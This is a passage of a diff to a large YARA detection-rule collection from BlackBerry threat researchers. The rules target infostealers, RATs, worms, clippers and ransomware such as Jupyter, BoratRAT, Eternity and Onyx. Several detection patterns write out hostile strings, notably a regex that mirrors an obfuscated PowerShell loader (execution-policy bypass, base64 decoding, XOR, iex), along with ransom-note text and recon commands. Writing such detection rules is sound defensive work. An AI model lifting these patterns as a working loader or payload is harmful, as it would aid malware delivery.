+		$e1 = { 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 }
+		$e2 = { 47 00 45 00 54 00 00 3D 63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 77 00 69 00 6E 00 76 00 65 00 72 00 2E 00 65 00 78 00 65 }
+		$e3 = { 00 2F 00 67 00 65 00 74 00 2F 00 }
+		$e4 = "FromBase64String"
+		$e5 = "get_UTF8"
+		$e6 = "WebResponse"
+		$e7 = "GetResponse"
+		$e8 = "Invoke"
+
+	condition:
+		pe.imports( "mscoree.dll" , "_CorDllMain" ) and dotnet.version == "v4.0.30319" and dotnet.assembly.version.major == 0 and dotnet.assembly.version.minor == 0 and all of ( $e* )
+}
+rule BLACKBERRY_Eternityclipper : FILE
+{
+	meta:
+		description = "Detects Eternity Clipper"
+		author = "BlackBerry Threat Research Team"
+		id = "18aedf62-2062-5f3a-a4b2-6c647efcf85b"
+		date = "2022-05-22"
+		modified = "2022-07-07"
+		reference = "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/EternityClipper.yar#L4-L30"
+		license_url = "N/A"
+		logic_hash = "bb766a8bcb0f31babdc12ceac9bb56b8b6a25119ec713fe30b99ed975f4b7a39"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
+
+	strings:
+		$s1 = "CopyFromScreen"
+		$s2 = "CaptureDesktop"
+		$s3 = "Win32Clipboard"
+		$s4 = "Clipboard Manager"
+		$s5 = "Eternity.exe" wide
+		$s6 = "AddClipboardFormatListener"
+		$s7 = "AesCryptoServiceProvider"
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and all of ( $s* ) )
 }
 rule BLACKBERRY_Mal_Infostealer_MSI_EXE_Jupyter_Certificate : FILE
 {
@@ -170224,107 +170238,131 @@ rule BLACKBERRY_Mal_Infostealer_Win32_Jupyter_Main_Module
 	condition:
 		10 of ( $g* ) and 1 of ( $h* ) and ( pe.imports ( "mscoree.dll" , "_CorDllMain" ) or $i )
 }
-rule BLACKBERRY_Headertip : FILE
+rule BLACKBERRY_Boratratinformation : FILE
 {
 	meta:
-		description = "Detects HeaderTip"
+		description = "Detects BoratRAT Information Module"
 		author = "BlackBerry Threat Research Team"
-		id = "8569fed8-0fa8-515a-8ca2-ca4c2a959bbe"
-		date = "2022-04-06"
-		modified = "2022-07-06"
-		reference = "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/HeaderTip.yar#L1-L18"
+		id = "2bd2ec00-3aa5-5f41-9e5b-713398a35b4a"
+		date = "2022-04-13"
+		modified = "2022-07-07"
+		reference = "https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/BoratRATInformation.yar#L1-L45"
 		license_url = "N/A"
-		logic_hash = "426c6ebd4ebf85cc4b13d47dc77ae2648fba2b0ccdb7eeaea6b96f19a46c2d4e"
+		logic_hash = "17545a0834e339039361802a6d675303a975b9de013620068f1a516e49e3138f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "type %temp%\\officecleaner.dat >> %objfile%"
-		$s2 = "product2020.mrbasic.com" wide
+		$s1 = "set_UseShellExecute"
+		$s2 = "execCMD"
+		$s3 = "hostname" wide
+		$s4 = "ipconfig" wide
+		$s5 = "tasklist" wide
+		$s6 = "arp -a" wide
+		$sp = {43 3A 5C 55 73 65 72 73 5C 41 64 6D 69 6E 69
+
+                   73 74 72 61 74 6F 72 5C 44 6F 77 6E 6C 6F 61
+
+                   64 73 5C 53 61 6E 74 61 52 61 74 2D 6D 61 69
+
+                   6E 5C 42 69 6E 61 72 69 65 73 5C 52 65 6C 65
+
+                   61 73 65 5C 50 6C 75 67 69 6E 73 5C 49 6E 66
+
+                   6F 72 6D 61 74 69 6F 6E 2E 70 64 62}
 
 	condition:
-		filesize < 750KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule BLACKBERRY_Eternityworm : FILE
+rule BLACKBERRY_Mal_Infostealer_Powershell_Jupyter_Updated_Samples
 {
 	meta:
-		description = "Detects Eternity Worm"
+		description = "Detects Jupter powershell via common strings"
 		author = "BlackBerry Threat Research Team"
-		id = "46860918-2c6e-528e-807c-ef6cf6c4f89b"
-		date = "2022-05-22"
-		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/EternityWorm.yar#L4-L31"
+		id = "429b1197-3280-544e-a287-050263028246"
+		date = "2021-11-04"
+		modified = "2022-07-06"
+		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_PowerShell_Jupyter_Updated_Samples.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "6d944eddc1cc5acbeab1a8c85f16380b22467a069f91e7e8dd0b682d98e71976"
+		logic_hash = "5a8e449316d41c2fa28c7137b18ec4c8ac72bb4a0923fae4da7dd89e844421cb"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 58
+		tags = ""
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "Eternity 2022" wide
-		$s2 = "Eternity" wide
-		$s3 = "Anal Worm" wide
-		$s4 = "Made in Heaven" wide
-		$s5 = "Van Darkholme" wide
-		$s6 = "EternityWorm.exe" wide
+		$c1 = /\.[T|t][O|o][L|l][O|o][W|w][E|e][R|r]\(\)\)?;[I|i][E|e][X|x]/
+		$c2 = "get-random -minimum 50000 -maximum 200000" nocase
+		$c3 = "ReaDALlBYTES" nocase
+		$c4 = /createshortcut\(\$env\:appdata\+'\\m\'\+\'icr\'\+\'oso\'\+\'ft\'\+\'\\w\'\+\'ind\'\+\'ow\'\+\'s\\\'\+\'st\'\+\'art\'\+\' me\'\+\'nu\'\+\'\\pr\'\+\'ogr\'\+\'ams\\\'\+\'st\'\+\'art\'\+\'up\'\+\'\\.{29}\.lnk\'\)/ nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and all of ( $s* ) )
+		all of ( $c* )
 }
-rule BLACKBERRY_Snake : FILE
+rule BLACKBERRY_Windealer_Library : FILE
 {
 	meta:
-		description = "Detects Snake"
+		description = "Detects WinDealer Loaded DLL"
 		author = "BlackBerry Threat Research Team"
-		id = "a8169a4e-4acd-5e54-915f-af1ff7f4cb1a"
-		date = "2022-06-03"
+		id = "d7fbf21b-9144-532a-ad5d-29543f0ffc33"
+		date = "2022-06-14"
 		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Snake.yar#L1-L19"
+		reference = "https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malwareZ"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Windealer_Library.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "70ba9a649f9926fd204d45eafd42ce639811552c132b743367d2ba8ebaf3ee63"
+		logic_hash = "35151a8c0486ceaddb5020cb81f644bba4b01d5f8e4726786abc65ae92ca9c3e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "Game1Screen_Form_Load"
-		$s2 = "get_KeyCode"
-		$s3 = "Good luck mate"
+		$s1 = "C:\\Users\\Public\\Documents\\Tencent\\QQ\\UserDataInfo.ini"
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"
+		$s3 = "SOFTWARE\\SogouInput\\red"
+		$s4 = "SOFTWARE\\SogouDesktopBar"
+		$s5 = "MozillaDll.dll"
+		$s6 = "Tencent Files"
+		$s7 = "wangwang"
+		$s8 = "WeChat Files"
+		$s9 = "MyDocument"
+		$s10 = "Skype"
+		$e1 = "AutoGetSystemInfo"
+		$e2 = "GetConfigInfo"
+		$e3 = "partInitOpt"
 
 	condition:
-		filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule BLACKBERRY_Mal_Infostealer_MSI_Jupyter_Embedded_Powershell : FILE
+
+rule BLACKBERRY_Mal_Win32_Onyx_Strain_Chaos_Ransomware_2022 : FILE
 {
 	meta:
-		description = "Detects Jupter by a specific PowerShell command present in the MSI Installer"
-		author = "BlackBerry Threat Research Team"
-		id = "feee2c1d-b6c5-5a79-a409-c2add83dc68f"
-		date = "2021-10-14"
-		modified = "2022-07-06"
-		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_MSI_Jupyter_Embedded_PowerShell.yar#L1-L20"
+		description = "Detects Onyx Ransomware build off of Chaos Builder v4"
+		author = "BlackBerry Threat Research"
+		id = "8c30c316-9fd3-5ad9-aea1-d93229cd9ca1"
+		date = "2022-05-10"
+		modified = "2022-07-07"
+		reference = "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Win32_Onyx_Strain_Chaos_Ransomware_2022.yar#L3-L28"
 		license_url = "N/A"
-		logic_hash = "7528342e5aea1c35b59a458695c0e363c6d6c6e1c2df38614ff185c74085ac89"
+		logic_hash = "2df2f36167710a4de4ff3fda8036472b1972b4175a0d14f8b06e0ad045eb5038"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$msi = { D0 CF 11 E0 A1 B1 1A E1 }
-		$x1 = /powershell-ep bypass -windowstyle hidden -command \"\$xp=\'\[AppDataFolder\]pd\w*\.(log|txt)\';\$xk=\'[a-zA-Z]{52}\';\$xb=\[\\\[\]System\.Convert\[\\\]\]::FromBase64String\(\[\\\[\]System\.IO\.File\[\\\]\]::ReadAllText\(\$xp\)\);remove-item \$xp;for\(\$i=0;\$i -lt \$xb.count;\)\[\\\{\]for\(\$j=0;\$j -lt \$xk\.length;\$j\+\+\)\[\\\{\]\$xb\[\\\[\]\$i\[\\\]\]=\$xb\[\\\[\]\$i\[\\\]\] -bxor \$xk\[\\\[\]\$j\[\\\]\];\$i\+\+;if\(\$i -ge \$xb.count\)\[\\\{\]\$j=\$xk\.length;\[\\\}\]\[\\\}\]\[\\\}\];\$xb=\[\\\[\]System.Text.Encoding\[\\\]\]::UTF8\.GetString\(\$xb\);iex \$xb;/ nocase
+		$s1 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
+		$s2 = "All of your files are currently encrypted by ONYX strain." wide
+		$s3 = "Inform your supervisors and stay calm!" wide
 
 	condition:
-		$msi at 0 and all of ( $x* )
+		uint16( 0 ) == 0x5a4d and pe.data_directories [ pe.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR ] . size != 0 and all of ( $s* )
 }
 
 rule BLACKBERRY_Eternitystealer : FILE
@@ -170397,184 +170435,82 @@ rule BLACKBERRY_Mal_Infostealer_Win32_Blackguard : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and pe.number_of_sections == 3 and pe.section_index ( ".text" ) == 0 and pe.section_index ( ".rsrc" ) == 1 and pe.section_index ( ".reloc" ) == 2 and ( ( all of ( $a* ) ) or ( ( 12 of ( $a* ) and all of ( $b* ) ) ) )
 }
-rule BLACKBERRY_Boratrat : FILE
+rule BLACKBERRY_Snake : FILE
 {
 	meta:
-		description = "Detects BoratRAT.exe"
+		description = "Detects Snake"
 		author = "BlackBerry Threat Research Team"
-		id = "d3c73c3b-885a-5fc2-a1bd-a05cadf1512f"
-		date = "2022-04-13"
+		id = "a8169a4e-4acd-5e54-915f-af1ff7f4cb1a"
+		date = "2022-06-03"
 		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/BoratRAT.yar#L1-L41"
+		reference = "https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Snake.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "3141300495288a96b48cfea491683042d172143295135ff82c058200c8d5108d"
+		logic_hash = "70ba9a649f9926fd204d45eafd42ce639811552c132b743367d2ba8ebaf3ee63"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "enigma1"
-		$s2 = "enigma2"
-		$s3 = "Server.Forms.FormFileManager.resources"
-		$s4 = "Server.Forms.FormFileSearcher.resources"
-		$s5 = "Server.Forms.FormKeylogger.resources"
-		$s6 = "Server.Forms.FormNetstat.resources"
-		$s7 = "Server.Forms.FormFun.resources"
-		$s8 = "Server.Forms.FormWebcam.resources"
-		$s9 = "BoratRat"
-		$s10 = "Keylogger.exe"
+		$s1 = "Game1Screen_Form_Load"
+		$s2 = "get_KeyCode"
+		$s3 = "Good luck mate"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 1000KB and all of them
 }
-rule BLACKBERRY_Mal_Infostealer_Powershell_Jupyter_Updated_Samples
+rule BLACKBERRY_Mal_Infostealer_MSI_Jupyter_Embedded_Powershell : FILE
 {
 	meta:
-		description = "Detects Jupter powershell via common strings"
+		description = "Detects Jupter by a specific PowerShell command present in the MSI Installer"
 		author = "BlackBerry Threat Research Team"
-		id = "429b1197-3280-544e-a287-050263028246"
-		date = "2021-11-04"
+		id = "feee2c1d-b6c5-5a79-a409-c2add83dc68f"
+		date = "2021-10-14"
 		modified = "2022-07-06"
 		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_PowerShell_Jupyter_Updated_Samples.yar#L1-L18"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_MSI_Jupyter_Embedded_PowerShell.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "5a8e449316d41c2fa28c7137b18ec4c8ac72bb4a0923fae4da7dd89e844421cb"
+		logic_hash = "7528342e5aea1c35b59a458695c0e363c6d6c6e1c2df38614ff185c74085ac89"
 		score = 75
-		quality = 33
-		tags = ""
+		quality = 60
+		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$c1 = /\.[T|t][O|o][L|l][O|o][W|w][E|e][R|r]\(\)\)?;[I|i][E|e][X|x]/
-		$c2 = "get-random -minimum 50000 -maximum 200000" nocase
-		$c3 = "ReaDALlBYTES" nocase
-		$c4 = /createshortcut\(\$env\:appdata\+'\\m\'\+\'icr\'\+\'oso\'\+\'ft\'\+\'\\w\'\+\'ind\'\+\'ow\'\+\'s\\\'\+\'st\'\+\'art\'\+\' me\'\+\'nu\'\+\'\\pr\'\+\'ogr\'\+\'ams\\\'\+\'st\'\+\'art\'\+\'up\'\+\'\\.{29}\.lnk\'\)/ nocase
+		$msi = { D0 CF 11 E0 A1 B1 1A E1 }
+		$x1 = /powershell-ep bypass -windowstyle hidden -command \"\$xp=\'\[AppDataFolder\]pd\w*\.(log|txt)\';\$xk=\'[a-zA-Z]{52}\';\$xb=\[\\\[\]System\.Convert\[\\\]\]::FromBase64String\(\[\\\[\]System\.IO\.File\[\\\]\]::ReadAllText\(\$xp\)\);remove-item \$xp;for\(\$i=0;\$i -lt \$xb.count;\)\[\\\{\]for\(\$j=0;\$j -lt \$xk\.length;\$j\+\+\)\[\\\{\]\$xb\[\\\[\]\$i\[\\\]\]=\$xb\[\\\[\]\$i\[\\\]\] -bxor \$xk\[\\\[\]\$j\[\\\]\];\$i\+\+;if\(\$i -ge \$xb.count\)\[\\\{\]\$j=\$xk\.length;\[\\\}\]\[\\\}\]\[\\\}\];\$xb=\[\\\[\]System.Text.Encoding\[\\\]\]::UTF8\.GetString\(\$xb\);iex \$xb;/ nocase
 
 	condition:
-		all of ( $c* )
+		$msi at 0 and all of ( $x* )
 }
-rule BLACKBERRY_Eternityclipper : FILE
+rule BLACKBERRY_Eternityransom : FILE
 {
 	meta:
-		description = "Detects Eternity Clipper"
+		description = "Detects Eternity Ransomware"
 		author = "BlackBerry Threat Research Team"
-		id = "18aedf62-2062-5f3a-a4b2-6c647efcf85b"
+		id = "2a00bca6-2245-5330-9ad7-522f7bab42f4"
 		date = "2022-05-22"
 		modified = "2022-07-07"
 		reference = "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/EternityClipper.yar#L4-L30"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/EternityRansom.yar#L4-L28"
 		license_url = "N/A"
-		logic_hash = "bb766a8bcb0f31babdc12ceac9bb56b8b6a25119ec713fe30b99ed975f4b7a39"
+		logic_hash = "9c4eabc8441b0bb80e582f4227f85b3e000e3fc6b1da237d9ce55df9716fb571"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "CopyFromScreen"
-		$s2 = "CaptureDesktop"
-		$s3 = "Win32Clipboard"
-		$s4 = "Clipboard Manager"
-		$s5 = "Eternity.exe" wide
-		$s6 = "AddClipboardFormatListener"
-		$s7 = "AesCryptoServiceProvider"
+		$s1 = "The harddisks of your computer have been encrypted with an Military grade encryption algorithm."
+		$s2 = "by Eternity group"
+		$s3 = "Eternity"
+		$s4 = "decryption_password"
+		$s5 = "Povlsomware"
 
 	condition:
 		( uint16( 0 ) == 0x5a4d and all of ( $s* ) )
 }
-rule BLACKBERRY_Mal_Win32_Chaos_Builder_Ransomware_2022 : FILE
-{
-	meta:
-		description = "Detects Chaos Ransomware Builder"
-		author = "BlackBerry Threat Research"
-		id = "53c812da-802c-5116-89aa-455d1a20a179"
-		date = "2022-05-10"
-		modified = "2022-07-08"
-		reference = "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Win32_Chaos_Builder_Ransomware_2022.yar#L4-L44"
-		license_url = "N/A"
-		logic_hash = "32b68ef2f6e011255080f2666170a4fad42c6a8dd28a05c1a58936dcd27084ec"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
-
-	strings:
-		$s0 = "1qw0ll8p9m8uezhqhyd" ascii wide
-		$s1 = "Chaos Ransomware Builder" ascii wide
-		$s2 = "payloadFutureName" ascii wide
-		$s3 = "read_it.txt" ascii wide
-		$s4 = "encryptedFileExtension" ascii wide
-		$x0 = "1098576" ascii wide
-		$x1 = "2197152" ascii wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) ) and ( 1 of ( $x* ) ) )
-}
-
-rule BLACKBERRY_Mal_Infostealer_Win32_Jupyter_Download_And_Execute_Module
-{
-	meta:
-		description = "Detects Jupter download and execute module. Research has shown it downloading SolarDelphi / JupyterStealer."
-		author = "BlackBerry Threat Research Team"
-		id = "318b0327-b4b0-57a6-8a24-51320b1026ec"
-		date = "2021-11-09"
-		modified = "2022-07-06"
-		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_Win32_Jupyter_Download_and_Execute_Module.yar#L4-L30"
-		license_url = "N/A"
-		logic_hash = "7491eeb06e88512711688a1baf6967e6b6bf80ad4937c16fd49059903cac35df"
-		score = 75
-		quality = 85
-		tags = ""
-		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
-
-	strings:
-		$e1 = { 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 }
-		$e2 = { 47 00 45 00 54 00 00 3D 63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 77 00 69 00 6E 00 76 00 65 00 72 00 2E 00 65 00 78 00 65 }
-		$e3 = { 00 2F 00 67 00 65 00 74 00 2F 00 }
-		$e4 = "FromBase64String"
-		$e5 = "get_UTF8"
-		$e6 = "WebResponse"
-		$e7 = "GetResponse"
-		$e8 = "Invoke"
-
-	condition:
-		pe.imports( "mscoree.dll" , "_CorDllMain" ) and dotnet.version == "v4.0.30319" and dotnet.assembly.version.major == 0 and dotnet.assembly.version.minor == 0 and all of ( $e* )
-}
-rule BLACKBERRY_Windealer_Executable : FILE
-{
-	meta:
-		description = "Detects WinDealer Executable"
-		author = "BlackBerry Threat Research Team"
-		id = "68fe2b61-5c2d-5434-a9c5-dae25ccd40a0"
-		date = "2022-06-14"
-		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malwareZ"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Windealer_executable.yar#L1-L23"
-		license_url = "N/A"
-		logic_hash = "296e89ca89d063d165b6abab6a1e1e0b641cbbe7ff0ea60125c6beada457a95b"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
-
-	strings:
-		$s1 = "28e4-20a6acec"
-		$s2 = "5a7e-42ccdb67"
-		$s3 = "632c-0ef22957"
-		$s4 = "63ae-a20cf808"
-		$s5 = "65ce-731bffbb"
-		$a1 = "remoteip"
-		$a2 = "sessionid"
-		$a3 = "remotedomain"
-		$a4 = "remark"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $s* ) and 1 of ( $a* )
-}
 rule BLACKBERRY_Boratratkeylogger : FILE
 {
 	meta:
@@ -170610,188 +170546,199 @@ rule BLACKBERRY_Boratratkeylogger : FILE
 		uint16( 0 ) == 0x5a4d and all of them
 }
 
-rule BLACKBERRY_Mal_Win32_Onyx_Strain_Chaos_Ransomware_2022 : FILE
+rule BLACKBERRY_Mal_Infostealer_EXE_Jupyter_Cert_36Ff : FILE
 {
 	meta:
-		description = "Detects Onyx Ransomware build off of Chaos Builder v4"
-		author = "BlackBerry Threat Research"
-		id = "8c30c316-9fd3-5ad9-aea1-d93229cd9ca1"
-		date = "2022-05-10"
-		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Win32_Onyx_Strain_Chaos_Ransomware_2022.yar#L3-L28"
+		description = "Detects Jupter executables by certificate OOO Sistema (36ff)"
+		author = "BlackBerry Research & Intelligence Team"
+		id = "5671b149-4eb6-5b13-92de-01b71a001802"
+		date = "2021-10-14"
+		modified = "2022-07-06"
+		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_EXE_Jupyter_Cert_36ff.yar#L3-L18"
 		license_url = "N/A"
-		logic_hash = "2df2f36167710a4de4ff3fda8036472b1972b4175a0d14f8b06e0ad045eb5038"
+		logic_hash = "8f543c592f23257bda8902229a9a8a735bb593254b279a1786fc85734cd56905"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
-	strings:
-		$s1 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
-		$s2 = "All of your files are currently encrypted by ONYX strain." wide
-		$s3 = "Inform your supervisors and stay calm!" wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.data_directories [ pe.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR ] . size != 0 and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "Certum Extended Validation Code Signing CA SHA2" and pe.signatures [ i ] . serial == "36:ff:67:4e:b3:05:e9:9c:35:56:5f:a3:01:d5:c4:b0" )
 }
-rule BLACKBERRY_Boratratinformation : FILE
+
+rule BLACKBERRY_Eternityworm : FILE
 {
 	meta:
-		description = "Detects BoratRAT Information Module"
+		description = "Detects Eternity Worm"
 		author = "BlackBerry Threat Research Team"
-		id = "2bd2ec00-3aa5-5f41-9e5b-713398a35b4a"
-		date = "2022-04-13"
+		id = "46860918-2c6e-528e-807c-ef6cf6c4f89b"
+		date = "2022-05-22"
 		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/BoratRATInformation.yar#L1-L45"
+		reference = "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/EternityWorm.yar#L4-L31"
 		license_url = "N/A"
-		logic_hash = "17545a0834e339039361802a6d675303a975b9de013620068f1a516e49e3138f"
+		logic_hash = "6d944eddc1cc5acbeab1a8c85f16380b22467a069f91e7e8dd0b682d98e71976"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$s1 = "set_UseShellExecute"
